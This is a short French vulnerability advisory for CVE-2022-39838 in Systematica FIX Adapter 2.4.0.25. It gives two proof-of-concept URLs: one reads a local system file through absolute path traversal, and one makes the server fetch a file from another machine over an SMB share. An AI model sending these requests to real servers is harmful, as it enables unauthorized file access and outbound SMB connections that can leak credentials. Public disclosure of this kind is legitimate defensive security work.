
Preuve de concept d'exploitation pour CVE-2022-39838 démontrant l'inclusion de fichier à distance et le traversement de chemin absolu dans Systematica FIX Adapter (ALFAFX) 2.4.0.25 via des requêtes HTTP.
Systematica FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 permet l'inclusion de fichiers à distance via un chemin de partage UNC, et permet également une traversée de chemin absolue vers des chemins locaux.
PoC:
http://192.168.88.11:8888/info?page=logfile&file=C:\Windows\System32\drivers\etc\hosts
http://192.168.88.11:8888/info?page=logfile&file=\\192.168.88.100\rfi\test.txt
Contrôle d'accès incorrect
Systematica
Systematica FIX Adapter (ALFAFX) - 2.4.0.25 (Build 13/09/2017)
À distance
true
Un utilisateur distant peut accéder à un fichier arbitraire du système d'exploitation via un chemin absolu. De plus, un utilisateur distant peut contraindre le serveur vulnérable à demander un fichier à une autre machine via SMB.
Ivashchenko Sergey (Jet Infosystems, jet.su)